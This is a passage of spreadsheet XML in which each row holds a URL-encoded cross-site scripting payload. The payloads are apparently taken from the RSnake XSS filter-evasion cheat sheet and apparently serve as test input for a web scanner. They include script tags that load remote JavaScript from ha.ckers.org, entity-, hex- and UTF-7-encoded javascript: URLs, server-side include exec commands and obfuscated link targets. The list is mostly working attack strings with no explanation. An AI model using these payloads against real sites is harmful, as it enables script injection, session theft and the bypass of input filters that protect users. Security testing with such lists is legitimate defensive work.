      <c r="A2166" s="3" t="s">
        <v>1188</v>
      </c>
      <c r="B2166" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3BBODY%7B-moz-binding%3Aurl%28%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%26quot%3B%29%7D%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="2167">
      <c r="A2167" s="3" t="s">
        <v>1189</v>
      </c>
      <c r="B2167" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BTABLE%20BACKGROUND%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26quot%3B%26gt%3B%26lt%3B%2FTABLE%26gt%3B</v>
      </c>
    </row>
    <row r="2168">
      <c r="A2168" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="B2168" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BTABLE%26gt%3B%26lt%3BTD%20BACKGROUND%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26quot%3B%26gt%3B%26lt%3B%2FTD%26gt%3B%26lt%3B%2FTABLE%26gt%3B</v>
      </c>
    </row>
    <row r="2169">
      <c r="A2169" s="3" t="s">
        <v>1191</v>
      </c>
      <c r="B2169" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BHTML%20xmlns%3Axss%26gt%3B</v>
      </c>
    </row>
    <row r="2170">
      <c r="A2170" s="3" t="s">
        <v>1192</v>
      </c>
      <c r="B2170" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXML%20ID%3DI%26gt%3B%26lt%3BX%26gt%3B%26lt%3BC%26gt%3B%26lt%3B%21%5BCDATA%5B%26lt%3BIMG%20SRC%3D%26quot%3Bjavas%5D%5D%26gt%3B%26lt%3B%21%5BCDATA%5Bcript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B%5D%5D%26gt%3B</v>
      </c>
    </row>
    <row r="2171">
      <c r="A2171" s="3" t="s">
        <v>1193</v>
      </c>
      <c r="B2171" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXML%20ID%3D%26quot%3Bxss%26quot%3B%26gt%3B%26lt%3BI%26gt%3B%26lt%3BB%26gt%3B%26lt%3BIMG%20SRC%3D%26quot%3Bjavas%26lt%3B%21--%20--%26gt%3Bcript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26quot%3B%26gt%3B%26lt%3B%2FB%26gt%3B%26lt%3B%2FI%26gt%3B%26lt%3B%2FXML%26gt%3B</v>
      </c>
    </row>
    <row r="2172">
      <c r="A2172" s="3" t="s">
        <v>1194</v>
      </c>
      <c r="B2172" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXML%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxsstest.xml%26quot%3B%20ID%3DI%26gt%3B%26lt%3B%2FXML%26gt%3B</v>
      </c>
    </row>
    <row r="2173">
      <c r="A2173" s="3" t="s">
        <v>764</v>
      </c>
      <c r="B2173" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BHTML%26gt%3B%26lt%3BBODY%26gt%3B</v>
      </c>
    </row>
    <row r="2174">
      <c r="A2174" s="3" t="s">
        <v>1195</v>
      </c>
      <c r="B2174" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%21--%5Bif%20gte%20IE%204%5D%26gt%3B</v>
      </c>
    </row>
    <row r="2175">
      <c r="A2175" s="3" t="s">
        <v>1196</v>
      </c>
      <c r="B2175" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BMETA%20HTTP-EQUIV%3D%26quot%3BSet-Cookie%26quot%3B%20Content%3D%26quot%3BUSERID%3D%26lt%3BSCRIPT%26gt%3Balert%28%26apos%3BXSS%26apos%3B%29%26lt%3B%2FSCRIPT%26gt%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2176">
      <c r="A2176" s="3" t="s">
        <v>1197</v>
      </c>
      <c r="B2176" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BXSS%20STYLE%3D%26quot%3Bbehavior%3A%20url%28http%3A%2F%2Fha.ckers.org%2Fxss.htc%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2177">
      <c r="A2177" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="B2177" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2178">
      <c r="A2178" s="3" t="s">
        <v>1199</v>
      </c>
      <c r="B2178" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%21--%23exec%20cmd%3D%26quot%3B%2Fbin%2Fecho%20%26apos%3B%26lt%3BSCRIPT%20SRC%26apos%3B%26quot%3B--%26gt%3B%26lt%3B%21--%23exec%20cmd%3D%26quot%3B%2Fbin%2Fecho%20%26apos%3B%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B%26apos%3B%26quot%3B--%26gt%3B</v>
      </c>
    </row>
    <row r="2179">
      <c r="A2179" s="3" t="s">
        <v>1200</v>
      </c>
      <c r="B2179" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%3F%20echo%28%26apos%3B%26lt%3BSCR%29%26apos%3B%3B</v>
      </c>
    </row>
    <row r="2180">
      <c r="A2180" s="3" t="s">
        <v>1201</v>
      </c>
      <c r="B2180" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBR%20SIZE%3D%26quot%3B%26amp%3B%7Balert%28%26apos%3BXSS%26apos%3B%29%7D%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2181">
      <c r="A2181" s="3" t="s">
        <v>1202</v>
      </c>
      <c r="B2181" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3DJaVaScRiPt%3Aalert%28%26apos%3BXSS%26apos%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="2182">
      <c r="A2182" s="3" t="s">
        <v>1203</v>
      </c>
      <c r="B2182" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%3Aalert%28%26amp%3Bquot%3BXSS%26amp%3Bquot%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="2183">
      <c r="A2183" s="3" t="s">
        <v>1204</v>
      </c>
      <c r="B2183" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%60javascript%3Aalert%28%26quot%3BRSnake%20says%2C%20%26apos%3BXSS%26apos%3B%26quot%3B%29%60%26gt%3B</v>
      </c>
    </row>
    <row r="2184">
      <c r="A2184" s="3" t="s">
        <v>1205</v>
      </c>
      <c r="B2184" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%26gt%3B</v>
      </c>
    </row>
    <row r="2185">
      <c r="A2185" s="3" t="s">
        <v>1206</v>
      </c>
      <c r="B2185" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26amp%3B%23106%3B%26amp%3B%2397%3B%26amp%3B%23118%3B%26amp%3B%2397%3B%26amp%3B%23115%3B%26amp%3B%2399%3B%26amp%3B%23114%3B%26amp%3B%23105%3B%26amp%3B%23112%3B%26amp%3B%23116%3B%26amp%3B%2358%3B%26amp%3B%2397%3B%26amp%3B%23108%3B%26amp%3B%23101%3B%26amp%3B%23114%3B%26amp%3B%23116%3B%26amp%3B%2340%3B%26amp%3B%2339%3B%26amp%3B%2388%3B%26amp%3B%2383%3B%26amp%3B%2383%3B%26amp%3B%2339%3B%26amp%3B%2341%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2186">
      <c r="A2186" s="3" t="s">
        <v>1207</v>
      </c>
      <c r="B2186" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26amp%3B%230000106%26amp%3B%230000097%26amp%3B%230000118%26amp%3B%230000097%26amp%3B%230000115%26amp%3B%230000099%26amp%3B%230000114%26amp%3B%230000105%26amp%3B%230000112%26amp%3B%230000116%26amp%3B%230000058%26amp%3B%230000097%26amp%3B%230000108%26amp%3B%230000101%26amp%3B%230000114%26amp%3B%230000116%26amp%3B%230000040%26amp%3B%230000039%26amp%3B%230000088%26amp%3B%230000083%26amp%3B%230000083%26amp%3B%230000039%26amp%3B%230000041%26gt%3B</v>
      </c>
    </row>
    <row r="2187">
      <c r="A2187" s="3" t="s">
        <v>1208</v>
      </c>
      <c r="B2187" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BDIV%20STYLE%3D%26quot%3Bbackground-image%3A%5C0075%5C0072%5C006C%5C0028%26apos%3B%5C006a%5C0061%5C0076%5C0061%5C0073%5C0063%5C0072%5C0069%5C0070%5C0074%5C003a%5C0061%5C006c%5C0065%5C0072%5C0074%5C0028.1027%5C0058.1053%5C0053%5C0027%5C0029%26apos%3B%5C0029%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2188">
      <c r="A2188" s="3" t="s">
        <v>1209</v>
      </c>
      <c r="B2188" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26amp%3B%23x6A%26amp%3B%23x61%26amp%3B%23x76%26amp%3B%23x61%26amp%3B%23x73%26amp%3B%23x63%26amp%3B%23x72%26amp%3B%23x69%26amp%3B%23x70%26amp%3B%23x74%26amp%3B%23x3A%26amp%3B%23x61%26amp%3B%23x6C%26amp%3B%23x65%26amp%3B%23x72%26amp%3B%23x74%26amp%3B%23x28%26amp%3B%23x27%26amp%3B%23x58%26amp%3B%23x53%26amp%3B%23x53%26amp%3B%23x27%26amp%3B%23x29%26gt%3B</v>
      </c>
    </row>
    <row r="2189">
      <c r="A2189" s="3" t="s">
        <v>1210</v>
      </c>
      <c r="B2189" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BHEAD%26gt%3B%26lt%3BMETA%20HTTP-EQUIV%3D%26quot%3BCONTENT-TYPE%26quot%3B%20CONTENT%3D%26quot%3Btext%2Fhtml%3B%20charset%3DUTF-7%26quot%3B%26gt%3B%20%26lt%3B%2FHEAD%26gt%3B%2BADw-SCRIPT%2BAD4-alert%28%26apos%3BXSS%26apos%3B%29%3B%2BADw-%2FSCRIPT%2BAD4-</v>
      </c>
    </row>
    <row r="2190">
      <c r="A2190" s="3" t="s">
        <v>1211</v>
      </c>
      <c r="B2190" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%26quot%3B%3Balert%28%26apos%3BXSS%26apos%3B%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="2191">
      <c r="A2191" s="3" t="s">
        <v>1212</v>
      </c>
      <c r="B2191" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%2FTITLE%26gt%3B%26lt%3BSCRIPT%26gt%3Balert%28%22XSS%22%29%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2192">
      <c r="A2192" s="3" t="s">
        <v>1213</v>
      </c>
      <c r="B2192" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSTYLE%26gt%3B%40im%5Cport%26apos%3B%5Cja%5Cvasc%5Cript%3Aalert%28%26quot%3BXSS%26quot%3B%29%26apos%3B%3B%26lt%3B%2FSTYLE%26gt%3B</v>
      </c>
    </row>
    <row r="2193">
      <c r="A2193" s="3" t="s">
        <v>1214</v>
      </c>
      <c r="B2193" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bjav%26%23x09%3Bascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2194">
      <c r="A2194" s="3" t="s">
        <v>1215</v>
      </c>
      <c r="B2194" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bjav%26amp%3B%23x09%3Bascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2195">
      <c r="A2195" s="3" t="s">
        <v>1216</v>
      </c>
      <c r="B2195" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bjav%26amp%3B%23x0A%3Bascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2196">
      <c r="A2196" s="3" t="s">
        <v>1217</v>
      </c>
      <c r="B2196" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bjav%26amp%3B%23x0D%3Bascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2197">
      <c r="A2197" s="3" t="s">
        <v>1218</v>
      </c>
      <c r="B2197" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%26%23x0D%3BSRC%26%23x0D%3B%3D%26%23x0D%3B%26quot%3B%26%23x0D%3Bj%26%23x0D%3Ba%26%23x0D%3Bv%26%23x0D%3Ba%26%23x0D%3Bs%26%23x0D%3Bc%26%23x0D%3Br%26%23x0D%3Bi%26%23x0D%3Bp%26%23x0D%3Bt%26%23x0D%3B%3A%26%23x0D%3Ba%26%23x0D%3Bl%26%23x0D%3Be%26%23x0D%3Br%26%23x0D%3Bt%26%23x0D%3B%28%26%23x0D%3B%26apos%3B%26%23x0D%3BX%26%23x0D%3BS%26%23x0D%3BS%26%23x0D%3B%26apos%3B%26%23x0D%3B%29%26%23x0D%3B%26quot%3B%26%23x0D%3B%26gt%3B%26%23x0D%3B</v>
      </c>
    </row>
    <row r="2198">
      <c r="A2198" s="3" t="s">
        <v>1219</v>
      </c>
      <c r="B2198" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%26apos%3Bprint%20%26quot%3B%26lt%3BIMG%20SRC%3Djava%5C0script%3Aalert%28%26quot%3BXSS%26quot%3B%29%3E%26quot%3B%3B%26apos%3B%26gt%3B%20out</v>
      </c>
    </row>
    <row r="2199">
      <c r="A2199" s="3" t="s">
        <v>1220</v>
      </c>
      <c r="B2199" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%26apos%3Bprint%20%26quot%3B%26amp%3B%26lt%3BSCR%5C0IPT%26gt%3Balert%28%26quot%3BXSS%26quot%3B%29%26lt%3B%2FSCR%5C0IPT%26gt%3B%26quot%3B%3B%26apos%3B%20%26gt%3B%20out</v>
      </c>
    </row>
    <row r="2200">
      <c r="A2200" s="3" t="s">
        <v>1221</v>
      </c>
      <c r="B2200" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3B%20%26amp%3B%2314%3B%20%20javascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2201">
      <c r="A2201" s="3" t="s">
        <v>1222</v>
      </c>
      <c r="B2201" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%2FXSS%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2202">
      <c r="A2202" s="3" t="s">
        <v>1223</v>
      </c>
      <c r="B2202" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BBODY%20onload%21%23%24%25%26amp%3B%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%26quot%3BXSS%26quot%3B%29%26gt%3B</v>
      </c>
    </row>
    <row r="2203">
      <c r="A2203" s="3" t="s">
        <v>1224</v>
      </c>
      <c r="B2203" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js</v>
      </c>
    </row>
    <row r="2204">
      <c r="A2204" s="3" t="s">
        <v>1225</v>
      </c>
      <c r="B2204" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20SRC%3D%2F%2Fha.ckers.org%2F.j%26gt%3B</v>
      </c>
    </row>
    <row r="2205">
      <c r="A2205" s="3" t="s">
        <v>1226</v>
      </c>
      <c r="B2205" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20SRC%3D%26quot%3Bjavascript%3Aalert%28%26apos%3BXSS%26apos%3B%29%26quot%3B</v>
      </c>
    </row>
    <row r="2206">
      <c r="A2206" s="3" t="s">
        <v>1227</v>
      </c>
      <c r="B2206" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIFRAME%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%26lt%3B</v>
      </c>
    </row>
    <row r="2207">
      <c r="A2207" s="3" t="s">
        <v>1228</v>
      </c>
      <c r="B2207" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3B%26lt%3BSCRIPT%26gt%3Balert%28%26quot%3BXSS%26quot%3B%29%3B%2F%2F%26lt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2208">
      <c r="A2208" s="3" t="s">
        <v>1229</v>
      </c>
      <c r="B2208" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BIMG%20%26quot%3B%26quot%3B%26quot%3B%26gt%3B%26lt%3BSCRIPT%26gt%3Balert%28%26quot%3BXSS%26quot%3B%29%26lt%3B%2FSCRIPT%26gt%3B%26quot%3B%26gt%3B</v>
      </c>
    </row>
    <row r="2209">
      <c r="A2209" s="3" t="s">
        <v>1230</v>
      </c>
      <c r="B2209" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Ba%3D%2FXSS%2F</v>
      </c>
    </row>
    <row r="2210">
      <c r="A2210" s="3" t="s">
        <v>1231</v>
      </c>
      <c r="B2210" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%26quot%3B%26gt%3B%26quot%3B%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2211">
      <c r="A2211" s="3" t="s">
        <v>1232</v>
      </c>
      <c r="B2211" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20%3D%26quot%3Bblah%26quot%3B%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2212">
      <c r="A2212" s="3" t="s">
        <v>1233</v>
      </c>
      <c r="B2212" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%26quot%3Bblah%26quot%3B%20%26apos%3B%26apos%3B%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2213">
      <c r="A2213" s="3" t="s">
        <v>1234</v>
      </c>
      <c r="B2213" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20%26quot%3Ba%3D%26apos%3B%26gt%3B%26apos%3B%26quot%3B%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2214">
      <c r="A2214" s="3" t="s">
        <v>1235</v>
      </c>
      <c r="B2214" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%60%26gt%3B%60%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2215">
      <c r="A2215" s="3" t="s">
        <v>1236</v>
      </c>
      <c r="B2215" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%26gt%3Bdocument.write%28%26quot%3B%26lt%3BSCRI%26quot%3B%29%3B%26lt%3B%2FSCRIPT%26gt%3BPT%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2216">
      <c r="A2216" s="3" t="s">
        <v>1237</v>
      </c>
      <c r="B2216" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BSCRIPT%20a%3D%26quot%3B%3E%26apos%3B%3E%26quot%3B%20SRC%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%26quot%3B%26gt%3B%26lt%3B%2FSCRIPT%26gt%3B</v>
      </c>
    </row>
    <row r="2217">
      <c r="A2217" s="3" t="s">
        <v>1238</v>
      </c>
      <c r="B2217" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2F66.102.7.147%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2218">
      <c r="A2218" s="3" t="s">
        <v>1239</v>
      </c>
      <c r="B2218" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2219">
      <c r="A2219" s="3" t="s">
        <v>1240</v>
      </c>
      <c r="B2219" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2F1113982867%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2220">
      <c r="A2220" s="3" t="s">
        <v>1241</v>
      </c>
      <c r="B2220" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2221">
      <c r="A2221" s="3" t="s">
        <v>1242</v>
      </c>
      <c r="B2221" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2F0102.0146.0007.00000223%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2222">
      <c r="A2222" s="3" t="s">
        <v>1243</v>
      </c>
      <c r="B2222" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bh%26%23x0A%3Btt%26%2309%3Bp%3A%2F%2F6%26amp%3B%2309%3B6.000146.0x7.147%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2223">
      <c r="A2223" s="3" t="s">
        <v>1244</v>
      </c>
      <c r="B2223" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3B%2F%2Fwww.google.com%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2224">
      <c r="A2224" s="3" t="s">
        <v>1245</v>
      </c>
      <c r="B2224" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3B%2F%2Fgoogle%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2225">
      <c r="A2225" s="3" t="s">
        <v>1246</v>
      </c>
      <c r="B2225" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2Fha.ckers.org%40google%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2226">
      <c r="A2226" s="3" t="s">
        <v>1247</v>
      </c>
      <c r="B2226" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2Fgoogle%3Aha.ckers.org%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2227">
      <c r="A2227" s="3" t="s">
        <v>1248</v>
      </c>
      <c r="B2227" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2Fgoogle.com%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2228">
      <c r="A2228" s="3" t="s">
        <v>1249</v>
      </c>
      <c r="B2228" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2Fwww.google.com.%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2229">
      <c r="A2229" s="3" t="s">
        <v>1250</v>
      </c>
      <c r="B2229" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bjavascript%3Adocument.location%3D%26apos%3Bhttp%3A%2F%2Fwww.google.com%2F%26apos%3B%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2230">
      <c r="A2230" s="3" t="s">
        <v>1251</v>
      </c>
      <c r="B2230" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26lt%3BA%20HREF%3D%26quot%3Bhttp%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%26quot%3B%26gt%3BXSS%26lt%3B%2FA%26gt%3B</v>
      </c>
    </row>
    <row r="2231">
      <c r="A2231" s="3" t="s">
        <v>1252</v>
      </c>
      <c r="B2231" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2232">
      <c r="A2232" s="3" t="s">
        <v>1253</v>
      </c>
      <c r="B2232" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22jav%20ascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2233">
      <c r="A2233" s="3" t="s">
        <v>1254</v>
      </c>
      <c r="B2233" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2234">
      <c r="A2234" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="B2234" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22%20%26%2314%3B%20javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2235">
      <c r="A2235" s="3" t="s">
        <v>1256</v>
      </c>
      <c r="B2235" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Ddocument.vulnerable%3Dtrue%3B%3E</v>
      </c>
    </row>
    <row r="2236">
      <c r="A2236" s="3" t="s">
        <v>1257</v>
      </c>
      <c r="B2236" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2237">
      <c r="A2237" s="3" t="s">
        <v>1258</v>
      </c>
      <c r="B2237" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%3CB%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2238">
      <c r="A2238" s="3" t="s">
        <v>1259</v>
      </c>
      <c r="B2238" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22</v>
      </c>
    </row>
    <row r="2239">
      <c r="A2239" s="3" t="s">
        <v>1260</v>
      </c>
      <c r="B2239" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%20%3C</v>
      </c>
    </row>
    <row r="2240">
      <c r="A2240" s="3" t="s">
        <v>1261</v>
      </c>
      <c r="B2240" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ea%3D%2FXSS%2F%5Cndocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2241">
      <c r="A2241" s="3" t="s">
        <v>1262</v>
      </c>
      <c r="B2241" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3Bdocument.vulnerable%3Dtrue%3B%3B%2F%2F</v>
      </c>
    </row>
    <row r="2242">
